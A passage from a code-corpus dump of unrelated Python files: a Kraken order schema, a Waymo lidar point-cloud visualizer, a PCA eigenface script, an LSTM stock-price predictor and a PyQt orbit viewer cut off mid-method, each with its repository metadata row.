            closeprice=closeprice,
            closeprice2=closeprice2,
            deadline=deadline,
            validate=validate,
        )
        add_standard_order_request_body.additional_properties = d
        return add_standard_order_request_body

    @property
    def additional_keys(self) -> List[str]:
        # Keys held outside the declared schema fields.
        return list(self.additional_properties.keys())

    def __getitem__(self, key: str) -> Any:
        # Mapping-style access delegates to the additional properties only.
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| tlg7c5/kraken-connector | kraken_connector/schemas/add_standard_order_request_body.py | add_standard_order_request_body.py | py | 13,908 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "constants.trading.OrderType",
"line_number": 103,
"usage_type": "name"
},
{
"api_name": "constants.trading.TypeOrder",
"line_number": 104,
"usage_type": "name"
},
{
"api_name": "security.get_nonce",
"line_number": 107,
"usage_type": "call"
},
{
"api... |
21904300234 | import os
from pathlib import Path
import click
import numpy as np
import tensorflow as tf
from waymo_open_dataset.dataset_pb2 import Frame
from waymo_open_dataset.utils import frame_utils, transform_utils, range_image_utils
from waymo_open_dataset import dataset_pb2
from utils import save_frame, save_points
from visualization.visu_image import plot_points_on_image, save_camera_image
from visualization.visu_point_cloud import show_point_cloud
from multiprocessing import Pool
def convert_range_image_to_point_cloud(frame, range_images, camera_projections, range_image_top_pose, ri_index=(0, 1)):
    """
    Modified from the codes of Waymo Open Dataset.
    Convert range images to point cloud.
    Args:
        frame: open dataset frame
        range_images: A dict of {laser_name, [range_image_first_return, range_image_second_return]}.
        camera_projections: A dict of {laser_name,
            [camera_projection_from_first_return, camera_projection_from_second_return]}.
        range_image_top_pose: range image pixel pose for top lidar.
        ri_index: tuple of return indices to extract: (0,) for the first
            return only, (0, 1) to concatenate both returns.
    Returns:
        points: {[N, 3]} list of 3d lidar points of length 5 (number of lidars).
        cp_points: {[N, 6]} list of camera projections of length 5 (number of lidars).
        points_NLZ: {[N]} list of no-label-zone flags per lidar.
        points_intensity: {[N]} list of return intensities per lidar.
        points_elongation: {[N]} list of pulse elongations per lidar.
    """
    calibrations = sorted(frame.context.laser_calibrations, key=lambda c: c.name)
    points = []
    cp_points = []
    points_NLZ = []
    points_intensity = []
    points_elongation = []
    # Vehicle pose of this frame, needed to transform top-lidar pixels.
    frame_pose = tf.convert_to_tensor(np.reshape(np.array(frame.pose.transform), [4, 4]))
    # [H, W, 6]
    range_image_top_pose_tensor = tf.reshape(
        tf.convert_to_tensor(range_image_top_pose.data), range_image_top_pose.shape.dims
    )
    # [H, W, 3, 3]
    range_image_top_pose_tensor_rotation = transform_utils.get_rotation_matrix(
        range_image_top_pose_tensor[..., 0], range_image_top_pose_tensor[..., 1],
        range_image_top_pose_tensor[..., 2])
    range_image_top_pose_tensor_translation = range_image_top_pose_tensor[..., 3:]
    range_image_top_pose_tensor = transform_utils.get_transform(
        range_image_top_pose_tensor_rotation,
        range_image_top_pose_tensor_translation)
    for c in calibrations:
        points_single, cp_points_single, points_NLZ_single, points_intensity_single, points_elongation_single \
            = [], [], [], [], []
        for cur_ri_index in ri_index:
            range_image = range_images[c.name][cur_ri_index]
            if len(c.beam_inclinations) == 0:  # pylint: disable=g-explicit-length-test
                # Calibration only stores min/max: interpolate inclinations.
                beam_inclinations = range_image_utils.compute_inclination(
                    tf.constant([c.beam_inclination_min, c.beam_inclination_max]),
                    height=range_image.shape.dims[0])
            else:
                beam_inclinations = tf.constant(c.beam_inclinations)
            beam_inclinations = tf.reverse(beam_inclinations, axis=[-1])
            extrinsic = np.reshape(np.array(c.extrinsic.transform), [4, 4])
            range_image_tensor = tf.reshape(
                tf.convert_to_tensor(range_image.data), range_image.shape.dims)
            pixel_pose_local = None
            frame_pose_local = None
            if c.name == dataset_pb2.LaserName.TOP:
                # Only the top lidar carries per-pixel poses.
                pixel_pose_local = range_image_top_pose_tensor
                pixel_pose_local = tf.expand_dims(pixel_pose_local, axis=0)
                frame_pose_local = tf.expand_dims(frame_pose, axis=0)
            # Channel layout used below: 0=range, 1=intensity, 2=elongation,
            # 3=NLZ flag; only pixels with a positive range are kept.
            range_image_mask = range_image_tensor[..., 0] > 0
            range_image_NLZ = range_image_tensor[..., 3]
            range_image_intensity = range_image_tensor[..., 1]
            range_image_elongation = range_image_tensor[..., 2]
            range_image_cartesian = range_image_utils.extract_point_cloud_from_range_image(
                tf.expand_dims(range_image_tensor[..., 0], axis=0),
                tf.expand_dims(extrinsic, axis=0),
                tf.expand_dims(tf.convert_to_tensor(beam_inclinations), axis=0),
                pixel_pose=pixel_pose_local,
                frame_pose=frame_pose_local)
            range_image_cartesian = tf.squeeze(range_image_cartesian, axis=0)
            points_tensor = tf.gather_nd(range_image_cartesian,
                                         tf.where(range_image_mask))
            points_NLZ_tensor = tf.gather_nd(range_image_NLZ, tf.compat.v1.where(range_image_mask))
            points_intensity_tensor = tf.gather_nd(range_image_intensity, tf.compat.v1.where(range_image_mask))
            points_elongation_tensor = tf.gather_nd(range_image_elongation, tf.compat.v1.where(range_image_mask))
            # NOTE(review): camera projections always use return 0 here,
            # even for cur_ri_index == 1 — confirm this is intended.
            cp = camera_projections[c.name][0]
            cp_tensor = tf.reshape(tf.convert_to_tensor(cp.data), cp.shape.dims)
            cp_points_tensor = tf.gather_nd(cp_tensor, tf.where(range_image_mask))
            points_single.append(points_tensor.numpy())
            cp_points_single.append(cp_points_tensor.numpy())
            points_NLZ_single.append(points_NLZ_tensor.numpy())
            points_intensity_single.append(points_intensity_tensor.numpy())
            points_elongation_single.append(points_elongation_tensor.numpy())
        # Concatenate the requested returns for this lidar.
        points.append(np.concatenate(points_single, axis=0))
        cp_points.append(np.concatenate(cp_points_single, axis=0))
        points_NLZ.append(np.concatenate(points_NLZ_single, axis=0))
        points_intensity.append(np.concatenate(points_intensity_single, axis=0))
        points_elongation.append(np.concatenate(points_elongation_single, axis=0))
    return points, cp_points, points_NLZ, points_intensity, points_elongation
def save_camera_images(idx: int, frame: Frame, output_dir: Path) -> None:
    """Write every camera image of ``frame`` (with its labels) to disk."""
    for camera_image in frame.images:
        save_camera_image(idx, camera_image, frame.camera_labels, output_dir)
def save_data(frame: Frame, idx: int, points: np.ndarray,
              output_dir: Path) -> None:
    """Persist the frame protobuf and its point cloud to ``output_dir``."""
    save_frame(frame, idx, output_dir)
    save_points(idx, points, output_dir)
def visualize_camera_projection(idx: int, frame: Frame, output_dir: Path,
                                pcd_return) -> None:
    """Project the lidar points onto the first camera image and save a plot.

    Args:
        idx: Frame index (used in the output filename).
        frame: The waymo Frame protobuf.
        output_dir: Directory for the rendered image.
        pcd_return: Tuple of (points, camera projections), one array per
            lidar, as produced by convert_range_image_to_point_cloud.
    """
    points, points_cp = pcd_return
    points_all = np.concatenate(points, axis=0)
    points_cp_all = np.concatenate(points_cp, axis=0)
    images = sorted(frame.images, key=lambda i: i.name)  # type: ignore
    # distance between lidar points and vehicle frame origin
    points_tensor = tf.norm(points_all, axis=-1, keepdims=True)
    points_cp_tensor = tf.constant(points_cp_all, dtype=tf.int32)
    # Keep only the points whose projection targets the first camera.
    mask = tf.equal(points_cp_tensor[..., 0], images[0].name)
    points_cp_tensor = tf.cast(tf.gather_nd(
        points_cp_tensor, tf.where(mask)), tf.float32)
    points_tensor = tf.gather_nd(points_tensor, tf.where(mask))
    # Columns: (x, y) pixel coordinates followed by the point's range.
    projected_points_from_raw_data = tf.concat(
        [points_cp_tensor[..., 1:3], points_tensor], -1).numpy()
    plot_points_on_image(
        idx, projected_points_from_raw_data, images[0], output_dir)
def pcd_from_range_image(frame: Frame):
    """Extract the point clouds for both lidar returns of ``frame``.

    Returns:
        ((points, cp_points) for the 1st return,
         (points, cp_points) for the 2nd return).
    """
    def _range_image_to_pcd(ri_index: int = 0):
        # NOTE: closes over range_images/camera_projections/... assigned
        # below; safe because it is only called in the return statement.
        # BUG FIX: the local convert_range_image_to_point_cloud expects a
        # *tuple* of return indices and yields 5 lists, but this wrapper
        # was still written against the 2-result frame_utils API (see the
        # replaced call) and crashed with an int index / unpack error.
        # Wrap the index and keep only points and camera projections.
        points, points_cp = convert_range_image_to_point_cloud(
            frame, range_images, camera_projections, range_image_top_pose,
            ri_index=(ri_index,))[:2]
        return points, points_cp

    parsed_frame = frame_utils.parse_range_image_and_camera_projection(frame)
    range_images, camera_projections, _, range_image_top_pose = parsed_frame
    frame.lasers.sort(key=lambda laser: laser.name)
    return _range_image_to_pcd(), _range_image_to_pcd(1)
# def visualize_pcd_return(frame: Frame, pcd_return,
# visu: bool) -> None:
# points, points_cp = pcd_return
# points_all = np.concatenate(points, axis=0)
# # print(f'points_all shape: {points_all.shape}')
# # camera projection corresponding to each point
# points_cp_all = np.concatenate(points_cp, axis=0)
# # print(f'points_cp_all shape: {points_cp_all.shape}')
# if visu:
# show_point_cloud(points_all, frame.laser_labels)
def process_data(idx: int, frame: Frame, output_dir: Path, save: bool,
                 visu: bool) -> None:
    """Convert one frame to a point cloud, optionally visualize and save it.

    Args:
        idx: Frame index within the segment (used for output filenames).
        frame: The parsed waymo Frame protobuf.
        output_dir: Directory receiving images / point clouds.
        save: Persist the frame and its points to disk.
        visu: Render camera images, the point cloud and camera projections.
    """
    print(f'Start to process frame {idx:03}')
    # pylint: disable=no-member (E1101)
    range_images, camera_projections, range_image_top_pose = frame_utils.parse_range_image_and_camera_projection(frame)
    points, cp_points, points_in_NLZ_flag, points_intensity, points_elogation = convert_range_image_to_point_cloud(
        frame, range_images, camera_projections, range_image_top_pose, ri_index=(0, )
    )
    points_all = np.concatenate(points, axis=0)
    points_in_NLZ_flag = np.concatenate(points_in_NLZ_flag, axis=0).reshape(-1, 1)
    points_intensity = np.concatenate(points_intensity, axis=0).reshape(-1, 1)
    points_elogation = np.concatenate(points_elogation, axis=0).reshape(-1, 1)
    # BUG FIX: the original computed this filter but discarded the result
    # (bare expression statement). Assign it so the visualization only shows
    # the filtered points. Flag == -1 appears to mark points *outside*
    # no-label zones — TODO confirm against the Waymo range-image spec.
    points_all = points_all[points_in_NLZ_flag.reshape(-1) == -1]
    if visu:
        save_camera_images(idx, frame, output_dir)
        show_point_cloud(points_all, frame.laser_labels, idx, output_dir)
        visualize_camera_projection(idx, frame, output_dir, (points, cp_points))
    if save:
        save_data(frame, idx, points, output_dir)
def process_segment(segment_path: str, output_dir: Path, save: bool,
                    visu: bool, parallelism: int = 1) -> None:
    """Load every frame of a segment and process it, optionally in parallel.

    Args:
        segment_path: Path to the .tfrecord segment file.
        output_dir: Directory for generated artifacts.
        save: Forwarded to process_data.
        visu: Forwarded to process_data.
        parallelism: Number of worker processes; values <= 0 run serially.
    """
    record_dataset = tf.data.TFRecordDataset(segment_path, compression_type='')
    frames = []
    for frame_idx, record in enumerate(record_dataset):
        print(f'Loading frame: {frame_idx}')
        parsed = Frame()
        parsed.ParseFromString(bytearray(record.numpy()))
        frames.append(parsed)
    if parallelism > 0:
        job_args = [(frame_idx, parsed, output_dir, save, visu)
                    for frame_idx, parsed in enumerate(frames)]
        with Pool(parallelism) as pool:
            pool.starmap(process_data, job_args)
    else:
        for frame_idx, parsed in enumerate(frames):
            process_data(frame_idx, parsed, output_dir, save, visu)
@click.command(help='Point Cloud Visualization Demo')
@click.option('--save/--no-save', 'save', default=False,
              help='save frames and concatenated point clouds to disk')
@click.option('--visu/--no-visu', 'visu', default=False,
              help='visualize point clouds and save images')
@click.argument('segment_path', type=click.Path(exists=True))
@click.argument('output_dir', type=click.Path(exists=True))
def main(save: bool, visu: bool, segment_path: str, output_dir: str) -> None:
    """CLI entry point: validate the segment file and process it serially."""
    # Reject anything that is not a .tfrecord file up front.
    if os.path.basename(segment_path).split('.')[-1] != 'tfrecord':
        raise ValueError(f'segment file has to be of '
                         f'{tf.data.TFRecordDataset.__name__} type')
    # parallelism=0 -> serial processing (see process_segment).
    process_segment(segment_path, Path(output_dir), save, visu, 0)


if __name__ == '__main__':
    # pylint: disable=no-value-for-parameter
    main()  # click injects the CLI arguments
| friskit-china/waymo-open-dataset-visualizer | main.py | main.py | py | 11,384 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.convert_to_tensor",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "tensorflow.res... |
8167059453 | import sys
import os
import numpy as np
from numpy.linalg import svd
from numpy.linalg import eig
from skimage import io
from skimage import transform
# --- Eigenface (PCA) reconstruction script ---
# Usage: python pca.py <face_folder> <target_image_name>
face_folder = sys.argv[1]
# More robust than indexing the last character (which crashed on "").
if not face_folder.endswith('/'):
    face_folder += "/"
target = sys.argv[2]

# Load every face image in the folder as one flattened row vector.
image_data = []
for file in os.listdir(face_folder):
    filepath = os.path.join(face_folder, file)
    img = io.imread(filepath)
    img = np.array(img)
    img = img.flatten()
    image_data.append(img)
image_data = np.array(image_data)

# Center the data and compute the eigenfaces (columns of U) via SVD.
image_data_mean = np.mean(image_data, axis=0)
x = image_data - image_data_mean
U, s, V = np.linalg.svd(x.T, full_matrices=False)

# Project the target face onto the first 4 eigenfaces and reconstruct.
target = face_folder + target
ori_img = io.imread(target)
ori_img = np.array(ori_img)
img_shape = ori_img.shape  # remember (H, W, C) for the reconstruction
# Generalized from the hard-coded (1, 1080000), which only worked for
# 600x600 RGB images.
ori_img = np.reshape(ori_img, (1, -1))
ori_img = ori_img - image_data_mean
weights = np.dot(ori_img, U[:, :4])
recon = image_data_mean + np.dot(weights, U[:, :4].T)

# Rescale the reconstruction to [0, 255] and save it.
recon = np.reshape(recon, img_shape)  # generalized from (600, 600, 3)
recon -= np.min(recon)
recon /= np.max(recon)
recon = (recon * 255).astype(np.uint8)
io.imsave('reconstruction.png', recon)
| muachilin/Machine-Learning | hw4/pca.py | pca.py | py | 1,052 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_numbe... |
11783428086 |
# coding: utf-8
# In[1]:
#get_ipython().system(u'jupyter nbconvert --to script lstm_model.ipynb')
import os
import sys
import time
import pandas as pd
import datetime
#import pandas.io.data as web
from pandas_datareader import data
import matplotlib.pyplot as plt
from matplotlib import style
import glob
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout
from keras.layers import Activation, LSTM
from keras.utils import plot_model
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from math import sqrt
from keras.callbacks import EarlyStopping
#import load_data
# fix random seed for reproducibility
np.random.seed(7)
# In[2]:
# Number of rows the supervised target column is shifted into the future.
days_for_prediction = 30
# Input/output locations for the pipeline (relative to this script).
source_dir='../data/samples'
models_dir = '../models/lstm/'
supervised_data_dir = '../data/samples2'
prediction_data_dir = '../data/prediction/samples'
rmse_csv = '../data/rsme_ltsm.csv'
# # Build train and test datasets
# In[3]:
# frame a sequence as a supervised learning problem
def to_supervised(df, lag, org_col_name='Adj Close', new_col_name='Adj Close+'):
    """Frame a time series as a supervised learning problem.

    Adds column *new_col_name* holding *org_col_name* shifted ``lag`` rows
    into the future (row i receives the value of row i + lag), then drops the
    last ``lag`` rows, whose future value does not exist, and fills any
    remaining NaNs with 0.

    Note: the new column is also added to the caller's dataframe (original
    behaviour, relied on by create_supervised_data); only the truncation and
    fill happen on a copy.
    """
    # Shift only the target column; shifting the whole frame just to select
    # one column afterwards wastes work.
    df[new_col_name] = df[org_col_name].shift(-lag)
    # Truncate and copy so fillna below does not operate on a slice of the
    # original frame (avoids pandas SettingWithCopyWarning / silent no-op).
    df = df.iloc[:len(df) - lag].copy()
    return df.fillna(0)
def create_supervised_filename(directory, ticker):
    """Build the path of the supervised-learning CSV for *ticker*."""
    basename = "{}_supervised.csv".format(ticker)
    return os.path.join(directory, basename)
def create_supervised_data(source_dir, dest_dir, days_for_prediction=30, new_col_name = 'Adj Close+'):
    '''
    Input:
    - source_dir: directory where the stock price CSVs are located
    - dest_dir: directory where the supervised CSVs are written
    - days_for_prediction: number of days ahead for the prediction prices
    - new_col_name: name of the shifted target column
    Description:
        Read each csv file in source_dir, append the shifted target column via
        to_supervised(), write the result to dest_dir as
        "<ticker>_supervised.csv", and return a dict mapping
        ticker -> supervised dataframe.
    '''
    csv_file_pattern = os.path.join(source_dir, "*.csv")
    csv_files = glob.glob(csv_file_pattern)
    dfs = {}
    for filename in csv_files:
        # Ticker is the CSV basename without its extension.  os.path works on
        # every platform, unlike the previous split on '/'.
        ticker = os.path.splitext(os.path.basename(filename))[0]
        new_file = create_supervised_filename(dest_dir, ticker)
        # Columns: Open, High, Low, Close, Adj Close, Volume (Date is index).
        df = pd.read_csv(filename, index_col='Date')
        df = to_supervised(df, days_for_prediction, new_col_name=new_col_name)
        df.to_csv(new_file)
        dfs[ticker] = df
        print(ticker, filename, new_file)
    return dfs
# # Use LSTM model for each stock
# In[4]:
# Build the supervised datasets once up front (side effect: writes one
# "<ticker>_supervised.csv" per input CSV into supervised_data_dir).
dfs = create_supervised_data(source_dir=source_dir, dest_dir=supervised_data_dir, days_for_prediction=days_for_prediction)
# In[5]:
def create_lstm_model(max_features, lstm_units):
    """Build and compile a stacked two-layer LSTM regressor.

    max_features -- number of input features per timestep
    lstm_units   -- two ints: units of the first and second LSTM layers
    Returns a compiled keras Sequential model ending in a single linear unit.
    """
    model = Sequential()
    #model.add(LSTM(neurons, input_shape=(None, X_train.shape[1]), return_sequences=True)) #, dropout=0.2))
    #model.add(LSTM(max_features, batch_input_shape=(batch_size, None, train_X[i].shape[1]), dropout=0.2, stateful=True))
    #model.add(LSTM(1, input_shape=(max_features,1), return_sequences=True, dropout=0.2))
    #model.add(LSTM(max_features, return_sequences=False, dropout=0.2))
    #model.add(LSTM(input_dim=max_features, output_dim=300, return_sequences=True))
    # input_shape=(None, max_features): variable-length sequences of
    # max_features-dimensional timesteps.
    model.add(LSTM(units=lstm_units[0], input_shape=(None, max_features), return_sequences=True))
    model.add(Dropout(0.2))
    model.add(LSTM(lstm_units[1], return_sequences=False))
    model.add(Dropout(0.2))
    #model.add(Dense(1)) #, activation='sigmoid'))
    model.add(Dense(1, activation='linear'))
    #model.compile(loss='mse', optimizer='rmsprop')
    #model.compile(loss='binary_crossentropy',optimizer='rmsprop', metrics=['accuracy'])
    #model.compile(loss='mean_squared_error', optimizer='adam')
    # NOTE(review): 'accuracy' is not a meaningful metric for a regression
    # loss; kept as-is to preserve behaviour.
    model.compile(loss='mse', optimizer='rmsprop', metrics=['accuracy'])
    return model
# In[6]:
'''
def create_train_test(data):
X,y = data[:,0:-1], data[:, -1]
# Transform scale
X_scaler = MinMaxScaler(feature_range=(-1, 1))
y_scaler = MinMaxScaler(feature_range=(-1, 1))
scaled_X = X_scaler.fit_transform(X)
scaled_y = y_scaler.fit_transform(y)
print(scaled_y)
# Now split 80/20 for train and test data
#train_count = int(.8*len(data))
# last test_days is for test; the rest is for train
test_days = 90
train_count = len(data) - test_days
X_train, X_test = scaled_X[:train_count], scaled_X[train_count:]
y_train, y_test = scaled_y[:train_count], scaled_y[train_count:]
return y_scaler, X_train, y_train, X_test, y_test
'''
def create_train_test2(data):
    """Scale *data* to [-1, 1] and split it into train/test features/targets.

    The last 90 rows form the test set; everything before them is training
    data.  The last column of each row is the prediction target.  Returns the
    fitted scaler together with X_train, y_train, X_test, y_test.
    """
    scaler = MinMaxScaler(feature_range=(-1, 1))
    scaled = scaler.fit_transform(data)
    # Hold out the final 90 days for evaluation.
    split_at = len(data) - 90
    train_part = scaled[:split_at]
    test_part = scaled[split_at:]
    return (scaler,
            train_part[:, :-1], train_part[:, -1],
            test_part[:, :-1], test_part[:, -1])
def build_models(models_dir, supervised_data_dir, lstm_units):
    """Train one LSTM model per supervised CSV and save each as <ticker>.h5.

    models_dir          -- output directory for the saved keras models
    supervised_data_dir -- directory holding the *_supervised.csv files
    lstm_units          -- two ints: units of the first and second LSTM layers
    """
    # Define early stopping
    early_stopping = EarlyStopping(monitor='val_loss', patience=2) #value=0.00001
    rmse_list = list()
    models = {}
    predicted_dfs = {}
    # NOTE(review): early_stopping, rmse_list, models and predicted_dfs are
    # currently unused here (the early-stopping fit call is commented out).
    '''
    load supervised data
    create and save models
    '''
    csv_file_pattern = os.path.join(supervised_data_dir, "*.csv")
    csv_files = glob.glob(csv_file_pattern)
    dfs = {}
    print_first_model=True
    for filename in csv_files:
        data = pd.read_csv(filename, index_col='Date')
        #print(data.head())
        # Ticker recovered from "<ticker>_supervised.csv"; splitting on '/'
        # assumes POSIX path separators.
        arr = filename.split('/')
        ticker = arr[-1].split('.')[0].split('_')[0]
        print('Processing', ticker)
        # All columns except the shifted target are input features.
        max_features = len(data.columns) -1
        #y_scaler, X_train, y_train, X_test, y_test = create_train_test(data.values)
        scaler, X_train, y_train, X_test, y_test = create_train_test2(data.values)
        model = create_lstm_model(max_features, lstm_units)
        #plot_model(model, to_file=ticker + '.png', show_shapes=True, show_layer_names=True)
        if print_first_model:
            # Only the first architecture summary is printed; they are all alike.
            print(model.summary())
            print_first_model = False
        # Train data, reshaped to (samples, timesteps=1, features) for the LSTM.
        x1 = np.reshape(X_train, (X_train.shape[0], 1, X_train.shape[1]))
        y1 = np.reshape(y_train, (y_train.shape[0], 1))
        print(x1.shape, y1.shape)
        # Test data
        x2 = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))
        y2 = np.reshape(y_test, (y_test.shape[0], 1))
        #model.fit(x, y, batch_size=100, epochs=5, shuffle=True)
        print('Training...')
        #model.fit(x1, y1, batch_size=50, epochs=20, verbose=1, validation_split=0.2, callbacks=[early_stopping])
        # Note: Early stopping seems to give worse prediction?!! We want overfitting here?
        model.fit(x1, y1, batch_size=5, epochs=20, verbose=1, validation_data=(x2, y2)) #, callbacks=[early_stopping])
        model_fname = os.path.join(models_dir, ticker + ".h5")
        print('Saving model to', model_fname)
        model.save(model_fname)
# In[ ]:
# inverse scaling for a forecasted value
def invert_scale(scaler, X, value):
    """Undo the scaler transform for *value*, the target column.

    The scaler was fitted on full rows (features + target), so the scaled
    target is glued back onto its feature columns, the whole row is
    inverse-transformed, and only the restored target column is returned.
    """
    full_rows = np.column_stack((X, value))
    restored = scaler.inverse_transform(full_rows)
    # Only the last column (the forecasted value) is of interest.
    return restored[:, -1]
'''
Predict and evaluate test data
'''
def predict_evaluate(models_dir, supervised_data_dir, predicted_dir, rsme_csv):
    """Load each saved model, predict on its held-out test split and score it.

    For every <ticker>.h5 in models_dir: rebuild the test split from the
    matching supervised CSV, predict, invert the scaling, compute RMSE, and
    write a per-ticker predicted-vs-actual CSV to predicted_dir.  A summary
    CSV sorted by RMSE is written to rsme_csv.

    Returns (predicted_dfs, rmse_df).
    """
    model_file_pattern = os.path.join(models_dir, "*.h5")
    model_files = glob.glob(model_file_pattern)
    predicted_dfs = {}
    rmse_list = list()
    print(model_file_pattern)
    for model_file in model_files:
        print('loading', model_file)
        # Ticker from "<ticker>.h5"; splitting on '/' assumes POSIX paths.
        arr = model_file.split('/')
        ticker = arr[-1].split('.')[0]
        '''
        Read supervised data and set up test data for prediction
        '''
        supervised_filename = create_supervised_filename(supervised_data_dir, ticker)
        data = pd.read_csv(supervised_filename, index_col='Date')
        scaler, X_train, y_train, X_test, y_test = create_train_test2(data.values)
        # Test data, reshaped to (samples, timesteps=1, features).
        x2 = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))
        y2 = np.reshape(y_test, (y_test.shape[0], 1))
        # NOTE(review): y2 is unused below -- invert_scale uses y_test directly.
        print('Predicting...')
        model = load_model(model_file)
        predicted = model.predict(x2)
        predict_inversed = invert_scale(scaler, X_test, predicted)
        actual_inversed = invert_scale(scaler, X_test, y_test)
        rmse = sqrt(mean_squared_error(actual_inversed, predict_inversed))
        print('Test RMSE: %.3f' % rmse)
        rmse_list += [[ticker,rmse]]
        predicted_dfs[ticker] = pd.DataFrame({'predicted': predict_inversed.reshape(len(predict_inversed)),
                                              'actual': actual_inversed.reshape(len(actual_inversed))})
        predicted_file = os.path.join(predicted_dir, ticker + "_predicted.csv")
        print("Writing to", predicted_file)
        predicted_dfs[ticker].to_csv(predicted_file, index=False)
    rmse_df = pd.DataFrame(rmse_list, columns=['Stock Model', 'rsme'])
    rmse_df = rmse_df.sort_values(by='rsme')
    rmse_df.to_csv(rsme_csv, index=False)
    return predicted_dfs, rmse_df
# In[ ]:
# Train and save one model per supervised CSV.
build_models(models_dir, supervised_data_dir, lstm_units=[40,10])
# In[ ]:
# Evaluate every saved model and collect per-ticker RMSE.
predicted_dfs, rmse_df = predict_evaluate(models_dir,
                                          supervised_data_dir,
                                          prediction_data_dir,
                                          rmse_csv)
# In[ ]:
# Display the RMSE summary (notebook-style cell output).
rmse_df
# In[ ]:
# Plot stocks based on rmse order (best -> worst)
#cnt = 0
#for index, row in rmse_df.iterrows():
# key = row['Stock Model']
# predicted_dfs[key].plot(title=key + ': predicted vs actual')
# plt.show()
# In[ ]:
'''
cnt = 1
for index, row in rmse_df.iterrows():
key = row['Stock Model']
if (cnt % 2 != 0):
fig, axes = plt.subplots(nrows=1, ncols=2)
ax=axes[0]
else:
ax=axes[1]
predicted_dfs[key].plot(title=key + ': price vs days', figsize=(15,4), ax=ax)
cnt += 1
plt.show()
'''
# In[ ]:
| thongnbui/MIDS_capstone | code/lstm_model.py | lstm_model.py | py | 10,757 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.random.seed",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_... |
38199809243 | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QDesktopWidget, QFileDialog
from PyQt5.QtGui import QPalette, QColor
import numpy as np
from typing import *
import json
import qtmodern.styles
import qtmodern.windows
from MyModules.MyWindow import Ui_MainWindow
from MyModules.Orbits import Satellite
from MyModules.MPL3Dwidget import *
class MainWindow(QMainWindow, Ui_MainWindow):
    """Main application window: orbital-element sliders driving a 3D orbit plot."""

    def __init__(self, parent=None):
        super(MainWindow, self).__init__(parent)
        self.setupUi(self)
        self.center()
        # Create the matplotlib 3D plot
        self.plotCanvas = MplCanvas(self.plotWidget, width=5, height=5, dpi=100)
        self.toolbar = NavigationToolbar(self.plotCanvas, self.plotWidget)
        self.plotLayout.addWidget(self.plotCanvas)
        self.plotLayout.addWidget(self.toolbar)
        self.plotWidget.setLayout(self.plotLayout)
        # connect every slider to the function that handles the ploting
        sliders = [self.slider_MA, self.slider_AOP, self.slider_ECC, self.slider_INC, self.slider_LAN, self.slider_SMA]
        for slider in sliders:
            slider.sliderReleased.connect(self.slider_released)
        self.slider_released()  # Initialize the plot
        self.actionExport_to_json.triggered.connect(lambda: self.export_to_json())
        self.actionImport_from_json.triggered.connect(lambda: self.import_from_json())
        self.planet_actions = [self.actionMercury, self.actionVenus, self.actionEarth, self.actionMars,
                               self.actionJupiter, self.actionSaturn, self.actionUranus, self.actionNeptune, self.actionPluto]
        for act in self.planet_actions:
            act.triggered.connect(lambda: self.display_planets())

    def center(self):
        """ This function centers the window at launch"""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())

    def slider_released(self):
        """ Triggered when a slider is released. Computes the new positions and plots the new graph"""
        pos = self.calculate_position(self.getSliderValues())
        self.plot(pos)

    def plot(self, pos):
        """ Handles the ploting"""
        self.plotCanvas.axes.cla()
        # pos is indexed pos[:, 0..2] below, i.e. an (N, 3) array of x/y/z
        # orbit samples produced by calculate_position.
        self.plotCanvas.axes.plot(pos[:, 0], pos[:, 1], pos[:, 2], 'o', markersize=1)
        # Central body drawn at the origin.
        self.plotCanvas.axes.plot([0], [0], [0], 'o', color='yellow', markersize='10')
        self.plotCanvas.axes.mouse_init(rotate_btn=1, zoom_btn=3)
        set_axes_equal(self.plotCanvas.axes)
        # plot_background_color / plot_face_color are module-level globals set
        # in the __main__ block.
        self.plotCanvas.fig.set_facecolor(plot_background_color)
        self.plotCanvas.axes.patch.set_facecolor(plot_face_color)
        self.plotCanvas.draw()

    def getSliderValues(self) -> List[float]:
        """ Returns the current values displayed by the sliders"""
        # Order: SMA, INC, ECC, LAN, AOP, MA.  The eccentricity slider stores
        # its value scaled by 1e3 (integer sliders cannot hold fractions).
        return [float(self.slider_SMA.value()),
                float(self.slider_INC.value()),
                float(self.slider_ECC.value()) / 1e3,
                float(self.slider_LAN.value()),
                float(self.slider_AOP.value()),
                float(self.slider_MA.value())]

    def setSliderValues(self, values: Dict[str, float]):
        """Set every slider from a dict of orbital elements and replot."""
        self.slider_SMA.setValue(int(values['SMA']))
        self.slider_INC.setValue(int(values['INC']))
        self.slider_ECC.setValue(int(values['ECC'] * 1e3))
        self.slider_LAN.setValue(int(values['LAN']))
        self.slider_AOP.setValue(int(values['AOP']))
        self.slider_MA.setValue(int(values['MA']))
        self.slider_released()

    def calculate_position(self, values: List[float]):
        """Sample positions over one orbital period of the described satellite."""
        obj = Satellite(*values)
        # 200 evenly spaced times over one period T.
        time = np.linspace(0, obj.T, 200)
        pos = obj.orbitalparam2vectorList(time)
        return pos

    def export_to_json(self):
        """Writes the current values of the sliders to a new JSON file"""
        # NOTE(review): a cancelled dialog returns '' here, making open('')
        # raise -- confirm whether cancellation should be handled.
        file_name = self.FileDialog()
